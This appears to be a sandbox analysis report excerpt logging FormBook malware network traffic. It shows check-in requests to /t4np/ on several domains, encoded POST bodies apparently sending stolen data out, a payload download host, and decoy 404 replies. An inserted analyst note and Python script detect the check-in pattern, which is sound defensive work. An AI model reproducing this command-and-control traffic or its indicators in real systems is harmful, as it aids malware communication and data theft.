          Source: global trafficHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.madisoncountylincoln.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.madisoncountylincoln.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.madisoncountylincoln.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 57 35 41 4e 77 46 37 41 6f 31 54 79 6c 39 48 44 32 33 6e 46 6f 72 65 6d 49 65 45 44 6d 4b 74 4b 49 6e 49 49 31 5a 5a 67 41 30 4a 48 52 41 69 31 4f 6d 58 56 35 31 7a 52 32 68 76 4b 33 6a 38 71 68 44 63 6f 72 45 6d 4e 78 52 67 32 44 36 6d 4b 58 75 33 48 5a 56 51 57 47 33 32 71 58 63 4a 6b 78 4d 69 49 31 57 65 37 33 41 75 6f 75 73 6d 4d 71 46 6c 57 6a 75 75 48 49 4d 56 68 64 6e 64 67 6e 48 4d 78 47 5f 56 47 57 48 6b 69 7a 4b 34 5a 34 62 42 7a 52 37 7a 52 61 75 6e 30 48 33 54 44 76 43 6c 52 7e 57 38 30 37 57 59 68 46 63 44 73 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=W5ANwF7Ao1Tyl9HD23nForemIeEDmKtKInII1ZZgA0JHRAi1OmXV51zR2hvK3j8qhDcorEmNxRg2D6mKXu3HZVQWG32qXcJkxMiI1We73AuousmMqFlWjuuHIMVhdndgnHMxG_VGWHkizK4Z4bBzR7zRaun0H3TDvClR~W807WYhFcDsng).
          Source: global trafficHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.metatv.appConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.metatv.appUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.metatv.app/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 28 50 51 4d 33 59 50 4d 61 32 7a 2d 50 59 50 33 34 70 4a 4b 37 70 6e 6c 7a 78 6a 79 6f 72 31 46 7a 36 62 64 51 56 58 45 28 6d 58 48 74 57 39 6b 52 4c 41 55 6e 46 76 4e 5a 77 38 63 55 4a 34 45 30 73 52 7a 72 4a 4e 62 58 39 5a 4b 51 48 44 7a 5a 54 77 72 79 57 49 55 70 58 42 64 50 32 31 55 44 35 68 62 53 63 68 7a 28 55 49 77 77 70 6e 73 4f 4d 76 7a 36 6b 67 67 63 59 6e 6e 4b 33 35 31 6f 53 54 54 53 6e 44 58 48 56 63 4f 51 56 43 4a 39 39 69 75 58 65 6e 30 6a 48 43 59 65 59 69 68 49 47 6f 41 79 64 48 71 38 57 4b 33 53 4f 38 36 74 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=(PQM3YPMa2z-PYP34pJK7pnlzxjyor1Fz6bdQVXE(mXHtW9kRLAUnFvNZw8cUJ4E0sRzrJNbX9ZKQHDzZTwryWIUpXBdP21UD5hbSchz(UIwwpnsOMvz6kggcYnnK351oSTTSnDXHVcOQVCJ99iuXen0jHCYeYihIGoAydHq8WK3SO86tQ).
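The request lines above have the shape the Snort "FormBook CnC Checkin" rules key on: the same short path (/t4np/) requested on five unrelated domains, one query parameter that never changes (LAIu=TchAG45) beside one that changes every time (ekDWdXmx=...), GETs sent with no User-Agent header at all, and POSTs to the same path that carry a Trident user agent and a 190-byte form body. The Python below is an added example and not part of the Joe Sandbox report: it takes a small list constructed from those request lines (method, host, path plus query, form body, User-Agent; the long random parameter values are abridged because only their variability matters) and pivots on exactly those three properties. The threshold of three hosts and the function names are mine.

```python
"""Pivot on the check-in shape in the HTTP traffic above.

Added example, not Joe Sandbox output. Three heuristics, all my own:
  * one URI path requested on several unrelated hosts during one run,
  * a parameter whose name and value never change across those hosts
    (a hard-coded campaign token worth pivoting on), and
  * GET requests sent with no User-Agent header at all.
"""
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"

# Constructed from the request lines above: method, host, path+query, form
# body and User-Agent (None when the request carried no such header). The
# random parameter values are abridged; only their variability matters here.
SAMPLE_REQUESTS = [
    ("GET", "a.uguu.se", "/fwvfviJb.dat", "", None),
    ("GET", "www.findmyoriginstory.com", "/t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0", "", None),
    ("GET", "www.emprendizajesocial.com", "/t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3db", "", None),
    ("GET", "www.brunaeleandro.com", "/t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXm&LAIu=TchAG45", "", None),
    ("GET", "www.madisoncountylincoln.com", "/t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOK", "", None),
    ("GET", "www.metatv.app", "/t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRr&LAIu=TchAG45", "", None),
    ("POST", "www.emprendizajesocial.com", "/t4np/", "ekDWdXmx=tSgSFmNUY58eMtsW(XyAVldn9BCr1q", UA),
    ("POST", "www.brunaeleandro.com", "/t4np/", "ekDWdXmx=ePIiAnw-TfOroHeqf_5rhKlt0xK2LM", UA),
    ("POST", "www.madisoncountylincoln.com", "/t4np/", "ekDWdXmx=W5ANwF7Ao1Tyl9HD23nForemIeEDmK", UA),
    ("POST", "www.metatv.app", "/t4np/", "ekDWdXmx=(PQM3YPMa2z-PYP34pJK7pnlzxjyor", UA),
]


def parameters(method, target, body):
    """(name, value) pairs from the query string plus, for POST, the form body."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if method == "POST":
        pairs += parse_qsl(body, keep_blank_values=True)
    return pairs


def analyze(requests, min_hosts=3):
    """Shared paths, the parameters fixed across them, and GETs lacking a UA."""
    path_hosts = defaultdict(set)                       # path -> hosts seen
    values = defaultdict(lambda: defaultdict(set))      # path -> name -> values
    seen = defaultdict(lambda: defaultdict(int))        # path -> name -> count
    no_ua = 0
    for method, host, target, body, ua in requests:
        path = urlsplit(target).path
        path_hosts[path].add(host)
        for name, value in parameters(method, target, body):
            values[path][name].add(value)
            seen[path][name] += 1
        if method == "GET" and ua is None:
            no_ua += 1
    shared = {p: sorted(h) for p, h in path_hosts.items() if len(h) >= min_hosts}
    constants = {}
    for path in shared:
        # a parameter seen at least twice with exactly one value is a fixed token
        fixed = {n: next(iter(v)) for n, v in values[path].items()
                 if len(v) == 1 and seen[path][n] >= 2}
        if fixed:
            constants[path] = fixed
    return {"shared_paths": shared, "constant_params": constants, "no_user_agent": no_ua}


if __name__ == "__main__":
    report = analyze(SAMPLE_REQUESTS)
    for path, hosts in report["shared_paths"].items():
        print(f"{path} on {len(hosts)} hosts; fixed params: {report['constant_params'].get(path)}")
    print("GET requests without User-Agent:", report["no_user_agent"])
```

Run against the sample, the only shared path is /t4np/ across all five domains, the only fixed token is LAIu=TchAG45, and six GETs carry no User-Agent (the three a.uguu.se downloads collapsed to one in the sample). The fixed token and the path are what to pivot on in proxy logs; the domains are not, because FormBook cycles through a list that is mostly decoys, which is why the responses that follow are 404s from ordinary web servers rather than C2 replies. A host answering 404 to /t4np/ is therefore not cleared, and a host answering anything else to the same request deserves a closer look.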
          Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Tue, 21 Mar 2023 08:11:27 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 
0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Mar 2023 08:11:38 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Tue, 21 Mar 2023 08:11:42 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:03 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: store_session=9fd82tovui4062jsi2krb883uj; expires=Tue, 21-Mar-2023 09:11:05 GMT; Max-Age=3600; path=/; SameSite=LaxVary: Accept-Encoding,User-AgentCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KWaFRMSY0lCpPiDwf8DPuoaa0gu1Sb1Kcm8IfI25sJnbf5w3hc1ru9gPYcFjKOGzU60ooqcsEsBwFrc261uXwRK6O8iqCp6UGCkkqv2DM%2FuJG%2BATv00MSmQZDFv9Z0Mx7Yt4facPX%2F%2BwNWqW6fAZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba46084491e3-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 93 41 8b d4 40 10 85 ef fe 8a ba ed 65 26 d9 a8 2b 12 e3 80 08 b2 82 88 88 ee bd 92 ae a4 8b a9 74 85 ee ce 66 a3 f8 df a5 33 2e 9b 10 f6 60 9f 52 5d c5 f7 5e d7 23 95 8d bd 9c 5e 00 00 54 96 d0 5c 3e 97 32 72 14 3a 7d c3 8e e0 ab 46 f8 a4 a3 33 55 7e b9 7d 9a 0a 71 5e d7 e9 d4 6a e6 df 9b 9b 74 7a f4 1d bb f2 fa dd ae 33 a0 31 ec ba f2 d5 f5 f0 b0 ef b6 ea 62 59 bc 1c 1e f2 22 bb 81 5b 92 7b 8a dc e0 e1 83 67 94 c3 1d 79 83 0e 0f 01 5d 38 06 f2 dc 6e 09 7f 36 95 2d fe c7 57 52 3e 06 fe 45 e5 eb b7 cf 39 3b 4e c4 9d 8d a5 53 df a3 ec 67 84 1d 1d ed 65 66 4f d9 ba 0b d1 ab eb f6 0e 0d 87 41 70 2e d9 2d b4 5a b4 39 ef 95 26 36 d1 96 6f 6e 9e d7 a8 f2 55 58 55 fe 14 77 95 12 5b 65 6a 8b 5d ec b6 58 f5 87 6d de 3f 2c c1 90 e6 67 1d 01 3d 81 a8 9e d9 75 d0 aa 87 46 47 31 e0 34 42 4d d0 26 58 06 1f 2d 35 67 88 96 00 8d f1 14 02 d4 e8 37 c8 a8 40 2e 8c 7e 61 7a f8 f9 fd 0b 70 80 30 90 08 19 68 d4 7b 6a a2 cc 19 7c 6e 01 45 80 24 10 b4 c8 12 0e 8b 8b 06 dd 86 77 cf 81 23 24 94 d5 fe 9f 5b 8c 8b 05 61 77 86 9a 44 a7 6c b5 a9 d5 13 2b 04 eb a9 7d 7f 65 63 1c ca 3c 9f a6 29 eb d1 70 50 d7 e8 e8 e2 2c ec 
1a 15 97 35 da e7 57 a7 bb 45 2a 91 6f 93 54 5a 64 95 e3 e3 d2 2f 9b ae f2 e5 b7 fb 0b 00 00 ff ff 03 00 16 97 a9 87 7d 03 00 00 0d 0a Data Ascii: 1a8A@e&+tf3.`R]^#^T\>2r:}F3U~}q^jtz31bY"[{gy]8n6-WR>E9;NSgefOAp.-Z9&6onUXUw[ej]Xm?,g=uFG14BM&X-5g7@.~azp0h{j|nE$w#$[awDl+}ec<)pP,5WE*oTZd/}
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:05 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: store_session=vcue9caqutq1egitp5nphb1rt3; expires=Tue, 21-Mar-2023 09:11:07 GMT; Max-Age=3600; path=/; SameSite=LaxVary: Accept-Encoding,User-AgentCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3zhXmDCjpuF5r%2Bb9vkduN0KPsoBeKDzLZNY3uaKncUAAqPX6SkIDrpdCezdg4FjjcIBL%2FNo4lSZYEpqmzFAP2h8MVNRFhOst32YstoJPL4qiU5v6bAiqgArzH4QLWvfQu6cu8Y6vH%2BC8E3DIy%2F6M"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba562b803a8e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 64 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 31 32 70 78 2f 31 2e 35 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 56 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 
20 20 20 20 20 20 20 20 73 74 72 6f 6e 67 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 36 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c Data Ascii: 37d<html> <head> <title>Page Not Found</title> <style> body{ margin:0; padding:30px; font:12px/1.5 Helvetica,Arial,Verdana,sans-serif; } h1{ margin:0; font-size:48px; font-weight:normal; line-height:48px; } strong{ display:inline-block; width:65px; } </styl
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e6%2FEJDgHQjcuoYohdj0ra%2F4d26S7I%2F%2Bw3pN85cRgpRzvKvZ8TVLQZ1RwEuiccVevTyJQY4GtfAPWzseKtdfiDGgIup9D4IyI%2FBZWQiByR2tNVx7SRS3S28yavWbxfCbqlw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba77cf4a2c63-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 64 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 51 29 94 08 dc 03 47 83 17 b9 52 1b 1b 7b db 88 bf 47 49 85 c4 75 e6 cd 68 86 6e 9a 97 b5 7d ef 5b 78 b2 cf 1d f4 fb c7 6e bb 86 c5 2d e2 b6 b5 1b c4 c6 36 57 e7 ae aa 11 db dd 82 0d 05 3d 1d 99 82 38 cf 86 f4 a0 47 e1 55 bd 82 5d 54 d8 c4 f3 e0 09 af a2 21 9c 21 fa 88 fe 67 ca 2d f9 1f 13 96 6c 28 b1 0d 02 59 be cf 52 54 3c ec 5f 3b 18 5d 81 21 2a 7c 4d 1c c4 01 34 1c 0a 14 c9 17 c9 15 61 9a 9a 32 1b 72 de 67 29 85 1f 92 fb 0c 02 6f 33 00 4e 61 1c c7 ea 24 ea f4 52 b9 94 a0 8f 59 e1 be 26 fc 0b 18 c2 79 11 e1 fc c4 fc 02 00 00 ff ff 0d 0a Data Ascii: d4LN0Dw)j%hRQ)GR{GIuhn}[xn-6W=8GU]T!!g-l(YRT<_;]!*|M4a2rg)o3Na$RY&y
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j35Ko95Gih9X9oQzlqUwyxDva9uf6%2FviF1QglfgNtSZEGe%2BvokmHM1OjP7qIItQ6rs7MSbtjMUgDnP6CWLGU0vvNzD4P%2BxBg2jK05xN7S4tpFsO4Dhh6v4ufnjsHIFf0bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba87de882c3e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 74 61 74 76 2e 61 70 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 104<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.metatv.app Port 80</address></body></html>
